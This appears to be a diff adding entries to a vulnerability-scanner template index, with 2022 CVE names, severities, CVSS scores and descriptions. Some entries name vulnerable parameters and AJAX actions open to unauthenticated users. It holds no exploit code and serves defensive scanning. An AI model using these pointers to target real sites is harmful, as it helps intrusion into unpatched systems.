+{"ID":"CVE-2022-0599","Info":{"Name":"WordPress Mapping Multiple URLs Redirect Same Page \u003c=5.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Mapping Multiple URLs Redirect Same Page plugin 5.8 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the mmursp_id parameter before outputting it back in an admin page.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0599.yaml"} +{"ID":"CVE-2022-0653","Info":{"Name":"Wordpress Profile Builder Plugin Cross-Site Scripting","Severity":"medium","Description":"The Profile Builder User Profile \u0026 User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1..\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0653.yaml"} +{"ID":"CVE-2022-0656","Info":{"Name":"uDraw \u003c3.3.3 - Local File Inclusion","Severity":"high","Description":"uDraw before 3.3.3 does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc).","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-0656.yaml"} +{"ID":"CVE-2022-0660","Info":{"Name":"Microweber \u003c 1.2.11 - Information Disclosure","Severity":"high","Description":"Generation of error message containing sensitive information while viewing comments from \"load_module:comments#search=\"in Packagist microweber/microweber prior to 1.2.11.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-0660.yaml"} +{"ID":"CVE-2022-0678","Info":{"Name":"Packagist \u003c1.2.11 - Cross-Site Scripting","Severity":"medium","Description":"Packagist prior to 1.2.11 contains a cross-site scripting vulnerability via microweber/microweber. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0678.yaml"} +{"ID":"CVE-2022-0679","Info":{"Name":"WordPress Narnoo Distributor \u003c=2.5.1 - Local File Inclusion","Severity":"critical","Description":"WordPress Narnoo Distributor plugin 2.5.1 and prior is susceptible to local file inclusion. The plugin does not validate and sanitize the lib_path parameter before being passed into a call to require() via the narnoo_distributor_lib_request AJAX action, and the content of the file is displayed in the response as JSON data. This can also lead to a remote code execution vulnerability depending on system and configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0679.yaml"} +{"ID":"CVE-2022-0692","Info":{"Name":"Rudloff alltube prior to 3.0.1 - Open Redirect","Severity":"medium","Description":"An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist in versions prior to 3.0.1.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0692.yaml"} +{"ID":"CVE-2022-0735","Info":{"Name":"GitLab CE/EE - Runner Registration Token Disclosure","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.10 before 14.6.5, all versions starting from 14.7 before 14.7.4, all versions starting from 14.8 before 14.8.2. An unauthorised user was able to steal runner registration tokens through an information disclosure vulnerability using quick actions commands.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0735.yaml"} +{"ID":"CVE-2022-0776","Info":{"Name":"RevealJS postMessage \u003c4.3.0 - Cross-Site Scripting","Severity":"high","Description":"RevealJS postMessage before 4.3.0 contains a cross-site scripting vulnerability via the document object model.","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2022/CVE-2022-0776.yaml"} +{"ID":"CVE-2022-0781","Info":{"Name":"WordPress Nirweb Support \u003c2.8.2 - SQL Injection","Severity":"critical","Description":"WordPress Nirweb support plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0781.yaml"} +{"ID":"CVE-2022-0784","Info":{"Name":"Title Experiments Free \u003c 9.0.1 - Unauthenticated SQLi","Severity":"critical","Description":"The Title Experiments Free WordPress plugin before 9.0.1 does not sanitise and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action (available to unauthenticated users), leading to an unauthenticated SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0784.yaml"} +{"ID":"CVE-2022-0785","Info":{"Name":"WordPress Daily Prayer Time \u003c2022.03.01 - SQL Injection","Severity":"critical","Description":"WordPress Daily Prayer Time plugin prior to 2022.03.01 contains a SQL injection vulnerability.. It does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action, available to unauthenticated users, leading to SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0785.yaml"} +{"ID":"CVE-2022-0786","Info":{"Name":"KiviCare \u003c 2.3.9 - Unauthenticated SQLi","Severity":"critical","Description":"The plugin does not sanitise and escape some parameters before using them in SQL statements via the ajax_post AJAX action with the get_doctor_details route, leading to SQL Injections exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0786.yaml"} +{"ID":"CVE-2022-0788","Info":{"Name":"WordPress WP Fundraising Donation and Crowdfunding Platform \u003c1.5.0 - SQL Injection","Severity":"critical","Description":"WordPress WP Fundraising Donation and Crowdfunding Platform plugin before 1.5.0 contains an unauthenticated SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0788.yaml"} +{"ID":"CVE-2022-0817","Info":{"Name":"WordPress BadgeOS \u003c=3.7.0 - SQL Injection","Severity":"critical","Description":"WordPress BadgeOS plugin through 3.7.0 contains a SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0817.yaml"} +{"ID":"CVE-2022-0824","Info":{"Name":"Webmin prior to 1.990 - Improper Access Control to Remote Code Execution","Severity":"high","Description":"Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2022/CVE-2022-0824.yaml"} +{"ID":"CVE-2022-0826","Info":{"Name":"WP Video Gallery \u003c= 1.7.1 - Unauthenticated SQLi","Severity":"critical","Description":"The WP Video Gallery WordPress plugin through 1.7.1 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0826.yaml"} +{"ID":"CVE-2022-0867","Info":{"Name":"WordPress ARPrice \u003c3.6.1 - SQL Injection","Severity":"critical","Description":"WordPress ARPrice plugin prior to 3.6.1 contains a SQL injection vulnerability. It fails to properly sanitize and escape user supplied POST data before being inserted in an SQL statement and executed via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0867.yaml"} +{"ID":"CVE-2022-0870","Info":{"Name":"Gogs - SSRF","Severity":"medium","Description":"Server-Side Request Forgery (SSRF) in Gogs prior to 0.12.5.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-0870.yaml"} +{"ID":"CVE-2022-0885","Info":{"Name":"Member Hero \u003c= 1.0.9 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"The Member Hero WordPress plugin through 1.0.9 lacks authorization checks, and does not validate the a request parameter in an AJAX action, allowing unauthenticated users to call arbitrary PHP functions with no arguments.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0885.yaml"} +{"ID":"CVE-2022-0928","Info":{"Name":"Microweber \u003c 1.2.12 - Stored Cross-Site Scripting","Severity":"medium","Description":"Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability via the Type parameter in the body of POST request, which is triggered by Add/Edit Tax.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2022/CVE-2022-0928.yaml"} +{"ID":"CVE-2022-0948","Info":{"Name":"Order Listener for WooCommerce \u003c 3.2.2 - Unauthenticated SQLi","Severity":"critical","Description":"The Order Listener for WooCommerce WordPress plugin before 3.2.2 does not sanitise and escape the id parameter before using it in a SQL statement via a REST route available to unauthenticated users, leading to an SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0948.yaml"} +{"ID":"CVE-2022-0952","Info":{"Name":"Sitemap by click5 \u003c 1.0.36 - Unauthenticated Arbitrary Options Update","Severity":"high","Description":"The plugin does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2022/CVE-2022-0952.yaml"} +{"ID":"CVE-2022-0954","Info":{"Name":"Microweber \u003c1.2.11 - Stored Cross-Site Scripting","Severity":"medium","Description":"Microweber before 1.2.1 contains multiple stored cross-site scripting vulnerabilities in Shop's Other Settings, Autorespond E-mail Settings, and Payment Methods.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2022/CVE-2022-0954.yaml"} +{"ID":"CVE-2022-0963","Info":{"Name":"Microweber \u003c1.2.12 - Stored Cross-Site Scripting","Severity":"medium","Description":"Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability. It allows unrestricted upload of XML files,.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2022/CVE-2022-0963.yaml"} +{"ID":"CVE-2022-0968","Info":{"Name":"Microweber \u003c 1.2.12 - Integer Overflow (DOS)","Severity":"medium","Description":"The microweber application allows large characters to insert in the input field \"first \u0026 last name\" which can allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. The first name \u0026 last name input should be limited to 50 characters or max 100 characters.\n","Classification":{"CVSSScore":"5.5"}},"file_path":"cves/2022/CVE-2022-0968.yaml"} +{"ID":"CVE-2022-1007","Info":{"Name":"WordPress Advanced Booking Calendar \u003c1.7.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Advanced Booking Calendar plugin before 1.7.1 contains a cross-site scripting vulnerability. It does not sanitize and escape the room parameter before outputting it back in an admin page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-1007.yaml"} +{"ID":"CVE-2022-1020","Info":{"Name":"WordPress WooCommerce \u003c3.1.2 - Arbitrary Function Call","Severity":"critical","Description":"WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-1020.yaml"} +{"ID":"CVE-2022-1040","Info":{"Name":"Sophos Firewall \u003c=18.5 MR3 - Remote Code Execution","Severity":"critical","Description":"Sophos Firewall version v18.5 MR3 and older contains an authentication bypass vulnerability in the User Portal and Webadmin which could allow a remote attacker to execute code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-1040.yaml"} +{"ID":"CVE-2022-1054","Info":{"Name":"RSVP and Event Management \u003c 2.7.8 - Unauthenticated Entries Export","Severity":"medium","Description":"The RSVP and Event Management Plugin WordPress plugin before 2.7.8 does not have any authorisation checks when exporting its entries, and has the export function hooked to the init action. As a result, unauthenticated attackers could call it and retrieve PII such as first name, last name and email address of user registered for events","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-1054.yaml"} +{"ID":"CVE-2022-1057","Info":{"Name":"WordPress Pricing Deals for WooCommerce \u003c=2.0.2.02 - SQL Injection","Severity":"critical","Description":"WordPress Pricing Deals for WooCommerce plugin through 2.0.2.02 contains a SQL injection vulnerability. The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-1057.yaml"} +{"ID":"CVE-2022-1119","Info":{"Name":"WordPress Simple File List \u003c3.2.8 - Local File Inclusion","Severity":"high","Description":"WordPress Simple File List before 3.2.8 is vulnerable to local file inclusion via the eeFile parameter in the ~/includes/ee-downloader.php due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-1119.yaml"} +{"ID":"CVE-2022-1162","Info":{"Name":"GitLab CE/EE - Hardcoded password","Severity":"critical","Description":"A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML) in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allowing attackers to potentially take over accounts. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-\u003chash\u003e.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-1162.yaml"} +{"ID":"CVE-2022-1221","Info":{"Name":"WordPress Gwyn's Imagemap Selector \u003c=0.3.3 - Cross-Site Scripting","Severity":"medium","Description":"Wordpress Gwyn's Imagemap Selector plugin 0.3.3 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize the id and class parameters before returning them back in attributes.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-1221.yaml"} +{"ID":"CVE-2022-1386","Info":{"Name":"WordPress Fusion Builder \u003c 3.6.2 - Unauthenticated SSRF","Severity":"critical","Description":"The plugin, used in the Avada theme, does not validate a parameter in its forms which could be used to initiate arbitrary HTTP requests. The data returned is then reflected back in the application's response. This could be used to interact with hosts on the server's local network bypassing firewalls and access control measures.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-1386.yaml"} +{"ID":"CVE-2022-1388","Info":{"Name":"F5 BIG-IP iControl - REST Auth Bypass RCE","Severity":"critical","Description":"F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, may allow undisclosed requests to bypass iControl REST authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-1388.yaml"} +{"ID":"CVE-2022-1390","Info":{"Name":"WordPress Admin Word Count Column 2.2 - Local File Inclusion","Severity":"critical","Description":"The plugin does not validate the path parameter given to readfile(), which could allow unauthenticated attackers to read arbitrary files on server running old version of PHP susceptible to the null byte technique. This could also lead to RCE by using a Phar Deserialization technique.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-1390.yaml"} +{"ID":"CVE-2022-1391","Info":{"Name":"WordPress Cab fare calculator \u003c 1.0.4 - Local File Inclusion","Severity":"critical","Description":"The Cab fare calculator WordPress plugin before 1.0.4 does not validate the controller parameter before using it in require statements, which could lead to Local File Inclusion issues.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-1391.yaml"} +{"ID":"CVE-2022-1392","Info":{"Name":"WordPress Videos sync PDF \u003c=1.7.4 - Local File Inclusion","Severity":"high","Description":"WordPress Videos sync PDF 1.7.4 and prior does not validate the p parameter before using it in an include statement, which could lead to local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-1392.yaml"} +{"ID":"CVE-2022-1439","Info":{"Name":"Microweber \u003c1.2.15 - Cross-Site Scripting","Severity":"medium","Description":"Microweber prior to 1.2.15 contains a reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-1439.yaml"} +{"ID":"CVE-2022-1442","Info":{"Name":"WordPress Plugin Metform \u003c= 2.1.3 - Unauthenticated Sensitive Information Disclosure","Severity":"high","Description":"The Metform WordPress plugin is vulnerable to sensitive information disclosure due to improper access control in the ~/core/forms/action.php file which can be exploited by an unauthenticated attacker to view all API keys and secrets of integrated third-party APIs like that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more, in versions up to and including 2.1.3.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-1442.yaml"} +{"ID":"CVE-2022-1574","Info":{"Name":"WordPress HTML2WP \u003c=1.0.0 - Arbitrary File Upload","Severity":"critical","Description":"WordPress HTML2WP plugin through 1.0.0 contains an arbitrary file upload vulnerability. The plugin does not perform authorization and CSRF checks when importing files and does not validate them. As a result, an attacker can upload arbitrary files on the remote server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-1574.yaml"} +{"ID":"CVE-2022-1595","Info":{"Name":"HC Custom WP-Admin URL - 1.4 - Unauthenticated Secret URL Disclosure","Severity":"medium","Description":"The HC Custom WP-Admin URL WordPress plugin through 1.4 leaks the secret login URL when sending a specific crafted request.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-1595.yaml"} +{"ID":"CVE-2022-1597","Info":{"Name":"WordPress WPQA \u003c5.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress WPQA plugin prior to 5.4 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter on its reset password form.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-1597.yaml"} +{"ID":"CVE-2022-1598","Info":{"Name":"WordPress Plugin WPQA \u003c 5.5 - Unauthenticated Private Message Disclosure","Severity":"medium","Description":"The plugin which is a companion to the Discy and Himer themes, lacks authentication in a REST API endpoint, allowing unauthenticated users to discover private questions sent between users on the site.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-1598.yaml"} +{"ID":"CVE-2022-1609","Info":{"Name":"The School Management \u003c 9.9.7 - Remote Code Execution","Severity":"critical","Description":"The School Management plugin before version 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.","Classification":{"CVSSScore":"10.0"}},"file_path":"cves/2022/CVE-2022-1609.yaml"} +{"ID":"CVE-2022-1713","Info":{"Name":"Drawio \u003c18.0.4 - Server-Side Request Forgery","Severity":"high","Description":"Drawio prior to 18.0.4 is vulnerable to server-side request forgery. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-1713.yaml"} +{"ID":"CVE-2022-1724","Info":{"Name":"WordPress Simple Membership \u003c4.1.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Simple Membership plugin before 4.1.1 contains a reflected cross-site scripting vulnerability. It does not properly sanitize and escape parameters before outputting them back in AJAX actions.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-1724.yaml"} +{"ID":"CVE-2022-1768","Info":{"Name":"WordPress RSVPMaker \u003c=9.3.2 - SQL Injection","Severity":"high","Description":"WordPress RSVPMaker plugin through 9.3.2 contains a SQL injection vulnerability due to insufficient escaping and parameterization on user-supplied data passed to multiple SQL queries in ~/rsvpmaker-email.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-1768.yaml"} +{"ID":"CVE-2022-1815","Info":{"Name":"Drawio \u003c 18.1.2 - Server Side Request Forgery","Severity":"high","Description":"SSRF in /service endpoint in jgraph/drawio prior to 18.1.2. Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository jgraph/drawio prior to 18.1.2.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-1815.yaml"} +{"ID":"CVE-2022-1883","Info":{"Name":"Terraboard \u003c2.2.0 - SQL Injection","Severity":"high","Description":"Terraboard prior to 2.2.0 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2022/CVE-2022-1883.yaml"} +{"ID":"CVE-2022-1904","Info":{"Name":"WordPress Easy Pricing Tables \u003c3.2.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Easy Pricing Tables plugin before 3.2.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before reflecting it back in a page available to any user both authenticated and unauthenticated when a specific setting is enabled.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-1904.yaml"} +{"ID":"CVE-2022-1906","Info":{"Name":"WordPress Copyright Proof \u003c=4.16 - Cross-Site-Scripting","Severity":"medium","Description":"WordPress Copyright Proof plugin 4.16 and prior contains a cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back via an AJAX action available to both unauthenticated and authenticated users when a specific setting is enabled.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-1906.yaml"} +{"ID":"CVE-2022-1910","Info":{"Name":"WordPress Shortcodes and Extra Features for Phlox \u003c2.9.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Shortcodes and extra features plugin for the Phlox theme before 2.9.8 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the response. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-1910.yaml"} +{"ID":"CVE-2022-1916","Info":{"Name":"WordPress Active Products Tables for WooCommerce \u003c1.0.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Active Products Tables for WooCommerce plugin prior to 1.0.5 contains a cross-site scripting vulnerability.. The plugin does not sanitize and escape a parameter before outputting it back in the response of an AJAX action, An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-1916.yaml"} +{"ID":"CVE-2022-1933","Info":{"Name":"WordPress CDI \u003c5.1.9 - Cross Site Scripting","Severity":"medium","Description":"WordPress CDI plugin prior to 5.1.9 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the response of an AJAX action. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-1933.yaml"} +{"ID":"CVE-2022-1937","Info":{"Name":"WordPress Awin Data Feed \u003c=1.6 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Awin Data Feed plugin 1.6 and prior contains a cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back via an AJAX action, available to both unauthenticated and authenticated users.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-1937.yaml"} +{"ID":"CVE-2022-1946","Info":{"Name":"WordPress Gallery \u003c2.0.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Gallery plugin before 2.0.0 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back in the response of an AJAX action, available to both unauthenticated and authenticated users.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-1946.yaml"} +{"ID":"CVE-2022-1952","Info":{"Name":"eaSYNC \u003c 1.1.16 - Unauthenticated Arbitrary File Upload","Severity":"critical","Description":"The Free Booking Plugin for Hotels, Restaurant and Car Rental WordPress plugin before 1.1.16 suffers from insufficient input validation which leads to arbitrary file upload and subsequently to remote code execution. An AJAX action accessible to unauthenticated users is affected by this issue. An allowlist of valid file extensions is defined but is not used during the validation steps.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-1952.yaml"} +{"ID":"CVE-2022-2034","Info":{"Name":"Sensei LMS \u003c 4.5.0 - Unauthenticated Private Messages Disclosure","Severity":"medium","Description":"The Sensei LMS WordPress plugin before 4.5.0 does not have proper permissions set in one of its REST endpoint, allowing unauthenticated users to access private messages sent to teachers\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-2034.yaml"} +{"ID":"CVE-2022-21371","Info":{"Name":"Oracle WebLogic Server Local File Inclusion","Severity":"high","Description":"An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-21371.yaml"} +{"ID":"CVE-2022-21500","Info":{"Name":"Oracle E-Business Suite \u003c=12.2 - Authentication Bypass","Severity":"high","Description":"Oracle E-Business Suite (component: Manage Proxies) 12.1 and 12.2 are susceptible to an easily exploitable vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise it by self-registering for an account. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-21500.yaml"} +{"ID":"CVE-2022-21705","Info":{"Name":"October CMS - Remote Code Execution","Severity":"high","Description":"October CMS is susceptible to remote code execution. In affected versions, user input is not properly sanitized before rendering. An authenticated user with the permissions to create, modify, and delete website pages can bypass cms.safe_mode and cms.enableSafeMode in order to execute arbitrary code. This affects admin panels that rely on safe mode and restricted permissions.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2022/CVE-2022-21705.yaml"} +{"ID":"CVE-2022-2185","Info":{"Name":"GitLab CE/EE - Import RCE","Severity":"high","Description":"A critical issue has been discovered in GitLab affecting all versions starting from 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1 where an authenticated user authorized to import projects could import a maliciously crafted project leading to remote code execution.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2022/CVE-2022-2185.yaml"} +{"ID":"CVE-2022-2187","Info":{"Name":"WordPress Contact Form 7 Captcha \u003c0.1.2 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Contact Form 7 Captcha plugin before 0.1.2 contains a reflected cross-site scripting vulnerability. It does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-2187.yaml"} +{"ID":"CVE-2022-22242","Info":{"Name":"Juniper Web Device Manager - Cross-Site Scripting","Severity":"medium","Description":"Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-22242.yaml"} +{"ID":"CVE-2022-22536","Info":{"Name":"SAP Memory Pipes (MPI) Desynchronization","Severity":"critical","Description":"SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.","Classification":{"CVSSScore":"10"}},"file_path":"cves/2022/CVE-2022-22536.yaml"} +{"ID":"CVE-2022-2290","Info":{"Name":"Trilium \u003c0.52.4 - Cross-Site Scripting","Severity":"medium","Description":"Trilium prior to 0.52.4, 0.53.1-beta contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-2290.yaml"} +{"ID":"CVE-2022-22947","Info":{"Name":"Spring Cloud Gateway Code Injection","Severity":"critical","Description":"Applications using Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.","Classification":{"CVSSScore":"10"}},"file_path":"cves/2022/CVE-2022-22947.yaml"} +{"ID":"CVE-2022-22954","Info":{"Name":"VMware 